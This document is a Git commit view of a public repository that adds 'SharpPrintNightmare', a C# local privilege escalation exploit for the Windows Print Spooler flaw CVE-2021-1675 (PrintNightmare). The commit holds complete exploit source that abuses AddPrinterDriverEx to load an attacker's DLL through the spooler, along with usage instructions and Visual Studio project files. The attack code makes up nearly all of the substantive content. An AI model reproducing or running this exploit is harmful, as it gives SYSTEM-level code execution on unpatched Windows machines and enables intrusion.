1
0
Fork 0
mirror of https://github.com/cube0x0/CVE-2021-1675.git synced 2024-12-22 02:36:33 +00:00

c# LPE version

Signed-off-by: cube0x0 <vidfelt@protonmail.com>
This commit is contained in:
cube0x0 2021-07-01 13:45:37 +02:00
parent 69a14897dd
commit c047c45d75
21 changed files with 298 additions and 0 deletions

BIN
Images/poc2.png Normal file

Binary file not shown.

After

Width:  |  Height:  |  Size: 196 KiB

BIN
Images/poc3.png Normal file

Binary file not shown.

After

Width:  |  Height:  |  Size: 35 KiB

Binary file not shown.

View file

@ -0,0 +1,9 @@
# C# LPE Implementation of CVE-2021-1675
### Usage
```
C:\SharpPrintNightmare.exe C:\addCube.dll
```
![](../Images/poc3.png)

View file

@ -0,0 +1,6 @@
<?xml version="1.0" encoding="utf-8" ?>
<configuration>
<startup>
<supportedRuntime version="v4.0" sku=".NETFramework,Version=v4.5" />
</startup>
</configuration>

View file

@ -0,0 +1,150 @@
using System;
using System.ComponentModel;
using System.IO;
using System.Runtime.InteropServices;
namespace SharpPrintNightmare
{
class Program
{
[DllImport("kernel32.dll")]
static extern uint GetLastError();
[DllImport("winspool.drv", CharSet = CharSet.Auto, SetLastError = true)]
public static extern bool AddPrinterDriverEx([Optional] string pName, uint Level, [In, Out] IntPtr pDriverInfo, uint dwFileCopyFlags);
//https://www.pinvoke.net/default.aspx/winspool/EnumPrinterDrivers.html
[DllImport("winspool.drv", CharSet = CharSet.Auto, SetLastError = true)]
static extern bool EnumPrinterDrivers(String pName, String pEnvironment, uint level, IntPtr pDriverInfo, uint cdBuf, ref uint pcbNeeded, ref uint pcRetruned);
public struct DRIVER_INFO_2
{
public uint cVersion;
[MarshalAs(UnmanagedType.LPTStr)]
public string pName;
[MarshalAs(UnmanagedType.LPTStr)]
public string pEnvironment;
[MarshalAs(UnmanagedType.LPTStr)]
public string pDriverPath;
[MarshalAs(UnmanagedType.LPTStr)]
public string pDataFile;
[MarshalAs(UnmanagedType.LPTStr)]
public string pConfigFile;
}
// 3.1.4.4.8 RpcAddPrinterDriverEx Values
public static uint APD_STRICT_UPGRADE = 0x00000001;
public static uint APD_STRICT_DOWNGRADE = 0x00000002;
public static uint APD_COPY_ALL_FILES = 0x00000004;
public static uint APD_COPY_NEW_FILES = 0x00000008;
public static uint APD_COPY_FROM_DIRECTORY = 0x00000010;
public static uint APD_DONT_COPY_FILES_TO_CLUSTER = 0x00001000;
public static uint APD_COPY_TO_ALL_SPOOLERS = 0x00002000;
public static uint APD_INSTALL_WARNED_DRIVER = 0x00008000;
public static uint APD_RETURN_BLOCKING_STATUS_CODE = 0x00010000;
static void Main(string[] args)
{
string dllpath;
if (args == null || args.Length == 0)
{
Console.WriteLine("Need an argument containing the dll path");
Console.WriteLine(".\\SharpPrintNightmare.exe C:\\addCube.dll");
Environment.Exit(0);
}
dllpath = args[0];
Console.WriteLine("[*] Try 1...");
addPrinter(dllpath);
Console.WriteLine("[*] Try 2...");
addPrinter(dllpath);
Console.WriteLine("[*] Try 3...");
addPrinter(dllpath);
}
static void addPrinter(string dllpath)
{
DRIVER_INFO_2[] drivers = getDrivers();
string pDriverPath = Directory.GetParent(drivers[0].pDriverPath).FullName + "\\UNIDRV.DLL";
Console.WriteLine("[*] pDriverPath Found " + pDriverPath);
Console.WriteLine("[*] Executing C:\\addCube.dll");
//DRIVER_INFO_2 Level2 = drivers[0];
DRIVER_INFO_2 Level2 = new DRIVER_INFO_2();
Level2.cVersion = 3;
Level2.pConfigFile = "C:\\Windows\\System32\\kernelbase.dll";
Level2.pDataFile = dllpath;
Level2.pDriverPath = pDriverPath;
Level2.pEnvironment = "Windows x64";
Level2.pName = "12345";
string filename = Path.GetFileName(dllpath);
uint flags = APD_COPY_ALL_FILES | 0x10 | 0x8000;
//convert struct to unmanage code
IntPtr pnt = Marshal.AllocHGlobal(Marshal.SizeOf(Level2));
Marshal.StructureToPtr(Level2, pnt, false);
//call AddPrinterDriverEx
AddPrinterDriverEx(null, 2, pnt, flags);
Console.WriteLine("[*] Stage 0: " + Marshal.GetLastWin32Error());
Marshal.FreeHGlobal(pnt);
for (int i = 1; i <= 30; i++)
{
//add path to our exploit
Level2.pConfigFile = $"C:\\Windows\\System32\\spool\\drivers\\x64\\3\\old\\{i}\\{filename}";
//convert struct to unmanage code
IntPtr pnt2 = Marshal.AllocHGlobal(Marshal.SizeOf(Level2));
Marshal.StructureToPtr(Level2, pnt2, false);
//call AddPrinterDriverEx
AddPrinterDriverEx(null, 2, pnt2, flags);
int errorcode = Marshal.GetLastWin32Error();
Marshal.FreeHGlobal(pnt2);
if(errorcode == 0)
{
Console.WriteLine($"[*] Stage {i}: " + errorcode);
Console.WriteLine($"[+] Exploit Completed");
Environment.Exit(0);
}
}
}
static DRIVER_INFO_2[] getDrivers()
{
uint cbNeeded = 0;
uint cReturned = 0;
if (EnumPrinterDrivers(null, null, 2, IntPtr.Zero, 0, ref cbNeeded, ref cReturned))
{
//succeeds, but shouldn't, because buffer is zero (too small)!
throw new Exception("EnumPrinters should fail!");
}
int lastWin32Error = Marshal.GetLastWin32Error();
//ERROR_INSUFFICIENT_BUFFER = 122 expected, if not -> Exception
if (lastWin32Error != 122)
{
throw new Win32Exception(lastWin32Error);
}
IntPtr pAddr = Marshal.AllocHGlobal((int)cbNeeded);
if (EnumPrinterDrivers(null, null, 2, pAddr, cbNeeded, ref cbNeeded, ref cReturned))
{
DRIVER_INFO_2[] printerInfo2 = new DRIVER_INFO_2[cReturned];
long offset;
offset = pAddr.ToInt64();
Type type = typeof(DRIVER_INFO_2);
int increment = Marshal.SizeOf(type);
for (int i = 0; i < cReturned; i++)
{
printerInfo2[i] = (DRIVER_INFO_2)Marshal.PtrToStructure(new IntPtr(offset), type);
offset += increment;
}
Marshal.FreeHGlobal(pAddr);
return printerInfo2;
}
throw new Win32Exception(Marshal.GetLastWin32Error());
}
}
}

View file

@ -0,0 +1,35 @@
using System.Reflection;
using System.Runtime.InteropServices;
// General Information about an assembly is controlled through the following
// set of attributes. Change these attribute values to modify the information
// associated with an assembly.
[assembly: AssemblyTitle("SharpPrintNightmare")]
[assembly: AssemblyDescription("Cube0x0")]
[assembly: AssemblyConfiguration("Cube0x0")]
[assembly: AssemblyCompany("Cube0x0")]
[assembly: AssemblyProduct("SharpPrintNightmare")]
[assembly: AssemblyCopyright("Copyright © 2021")]
[assembly: AssemblyTrademark("Cube0x0")]
[assembly: AssemblyCulture("")]
// Setting ComVisible to false makes the types in this assembly not visible
// to COM components. If you need to access a type in this assembly from
// COM, set the ComVisible attribute to true on that type.
[assembly: ComVisible(false)]
// The following GUID is for the ID of the typelib if this project is exposed to COM
[assembly: Guid("5feb114b-49ec-4652-b29e-8cb5e752ec3e")]
// Version information for an assembly consists of the following four values:
//
// Major Version
// Minor Version
// Build Number
// Revision
//
// You can specify all the values or you can default the Build and Revision Numbers
// by using the '*' as shown below:
// [assembly: AssemblyVersion("1.0.*")]
[assembly: AssemblyVersion("1.0.0.0")]
[assembly: AssemblyFileVersion("1.0.0.0")]

View file

@ -0,0 +1,52 @@
<?xml version="1.0" encoding="utf-8"?>
<Project ToolsVersion="15.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<Import Project="$(MSBuildExtensionsPath)\$(MSBuildToolsVersion)\Microsoft.Common.props" Condition="Exists('$(MSBuildExtensionsPath)\$(MSBuildToolsVersion)\Microsoft.Common.props')" />
<PropertyGroup>
<Configuration Condition=" '$(Configuration)' == '' ">Debug</Configuration>
<Platform Condition=" '$(Platform)' == '' ">AnyCPU</Platform>
<ProjectGuid>{5FEB114B-49EC-4652-B29E-8CB5E752EC3E}</ProjectGuid>
<OutputType>Exe</OutputType>
<RootNamespace>CVE_2021_1675</RootNamespace>
<AssemblyName>SharpPrintNightmare</AssemblyName>
<TargetFrameworkVersion>v4.5</TargetFrameworkVersion>
<FileAlignment>512</FileAlignment>
<Deterministic>true</Deterministic>
</PropertyGroup>
<PropertyGroup Condition=" '$(Configuration)|$(Platform)' == 'Debug|AnyCPU' ">
<PlatformTarget>AnyCPU</PlatformTarget>
<DebugSymbols>true</DebugSymbols>
<DebugType>full</DebugType>
<Optimize>false</Optimize>
<OutputPath>bin\Debug\</OutputPath>
<DefineConstants>DEBUG;TRACE</DefineConstants>
<ErrorReport>prompt</ErrorReport>
<WarningLevel>4</WarningLevel>
</PropertyGroup>
<PropertyGroup Condition=" '$(Configuration)|$(Platform)' == 'Release|AnyCPU' ">
<PlatformTarget>AnyCPU</PlatformTarget>
<DebugType>pdbonly</DebugType>
<Optimize>true</Optimize>
<OutputPath>bin\Release\</OutputPath>
<DefineConstants>TRACE</DefineConstants>
<ErrorReport>prompt</ErrorReport>
<WarningLevel>4</WarningLevel>
</PropertyGroup>
<ItemGroup>
<Reference Include="System" />
<Reference Include="System.Core" />
<Reference Include="System.Xml.Linq" />
<Reference Include="System.Data.DataSetExtensions" />
<Reference Include="Microsoft.CSharp" />
<Reference Include="System.Data" />
<Reference Include="System.Net.Http" />
<Reference Include="System.Xml" />
</ItemGroup>
<ItemGroup>
<Compile Include="Program.cs" />
<Compile Include="Properties\AssemblyInfo.cs" />
</ItemGroup>
<ItemGroup>
<None Include="App.config" />
</ItemGroup>
<Import Project="$(MSBuildToolsPath)\Microsoft.CSharp.targets" />
</Project>

View file

@ -0,0 +1,25 @@

Microsoft Visual Studio Solution File, Format Version 12.00
# Visual Studio Version 16
VisualStudioVersion = 16.0.31205.134
MinimumVisualStudioVersion = 10.0.40219.1
Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "SharpPrintNightmare", "SharpPrintNightmare.csproj", "{5FEB114B-49EC-4652-B29E-8CB5E752EC3E}"
EndProject
Global
GlobalSection(SolutionConfigurationPlatforms) = preSolution
Debug|Any CPU = Debug|Any CPU
Release|Any CPU = Release|Any CPU
EndGlobalSection
GlobalSection(ProjectConfigurationPlatforms) = postSolution
{5FEB114B-49EC-4652-B29E-8CB5E752EC3E}.Debug|Any CPU.ActiveCfg = Debug|Any CPU
{5FEB114B-49EC-4652-B29E-8CB5E752EC3E}.Debug|Any CPU.Build.0 = Debug|Any CPU
{5FEB114B-49EC-4652-B29E-8CB5E752EC3E}.Release|Any CPU.ActiveCfg = Release|Any CPU
{5FEB114B-49EC-4652-B29E-8CB5E752EC3E}.Release|Any CPU.Build.0 = Release|Any CPU
EndGlobalSection
GlobalSection(SolutionProperties) = preSolution
HideSolutionNode = FALSE
EndGlobalSection
GlobalSection(ExtensibilityGlobals) = postSolution
SolutionGuid = {11E1DC60-0FB5-4AF6-86EF-EDB693E64849}
EndGlobalSection
EndGlobal

View file

@ -0,0 +1,6 @@
<?xml version="1.0" encoding="utf-8" ?>
<configuration>
<startup>
<supportedRuntime version="v4.0" sku=".NETFramework,Version=v4.5" />
</startup>
</configuration>

View file

@ -0,0 +1,4 @@
// <autogenerated />
using System;
using System.Reflection;
[assembly: global::System.Runtime.Versioning.TargetFrameworkAttribute(".NETFramework,Version=v4.5", FrameworkDisplayName = ".NET Framework 4.5")]

View file

@ -0,0 +1,4 @@
// <autogenerated />
using System;
using System.Reflection;
[assembly: global::System.Runtime.Versioning.TargetFrameworkAttribute(".NETFramework,Version=v4.5", FrameworkDisplayName = ".NET Framework 4.5")]

View file

@ -0,0 +1 @@
6a7ab24d74b7e25a7ffff290d4fe2dc8916038a2

View file

@ -0,0 +1,6 @@
C:\CVE-2021-1675\SharpPrintNightmare\SharpPrintNightmare\bin\Release\SharpPrintNightmare.exe.config
C:\CVE-2021-1675\SharpPrintNightmare\SharpPrintNightmare\bin\Release\SharpPrintNightmare.exe
C:\CVE-2021-1675\SharpPrintNightmare\SharpPrintNightmare\bin\Release\SharpPrintNightmare.pdb
C:\CVE-2021-1675\SharpPrintNightmare\SharpPrintNightmare\obj\Release\SharpPrintNightmare.csproj.CoreCompileInputs.cache
C:\CVE-2021-1675\SharpPrintNightmare\SharpPrintNightmare\obj\Release\SharpPrintNightmare.exe
C:\CVE-2021-1675\SharpPrintNightmare\SharpPrintNightmare\obj\Release\SharpPrintNightmare.pdb